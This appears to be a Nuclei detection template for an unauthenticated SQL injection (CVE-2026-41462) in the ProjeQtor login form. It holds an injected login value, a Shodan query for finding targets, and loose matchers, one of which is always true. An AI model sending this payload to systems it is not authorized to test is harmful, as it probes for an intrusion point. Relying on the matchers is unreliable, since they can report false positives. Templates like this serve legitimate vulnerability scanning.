id: CVE-2026-41462

info:
  name: ProjeQtor < 12.4.4 - Unauthenticated SQL Injection in Login
  author: 0xBlackash
  severity: critical
  description: |
    ProjeQtor versions 7.0 through 12.4.3 contain an unauthenticated SQL injection 
    vulnerability in the login functionality. The "login" parameter is directly 
    concatenated into a SQL query without sanitization.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41462
    - https://www.vulncheck.com/advisories/projeqtor-unauthenticated-sql-injection-via-login
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-41462
    cwe-id: CWE-89
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"ProjeQtor"
  tags: cve,cve2026,projeqtor,sqli,unauth

http:
  - method: POST
    path:
      - "{{BaseURL}}/login.php"
      - "{{BaseURL}}/projeqtor/login.php"
      - "{{BaseURL}}/login"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    body: |
      login=admin'%3B+SELECT+1%3B--+&password=anything&submit=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SQL syntax"
          - "mysql_fetch"
          - "You have an error in your SQL syntax"
          - "Warning: "
        condition: or

      - type: status
        status:
          - 200
          - 500

      - type: dsl
        dsl:
          - "duration>=0"   # basic request succeeded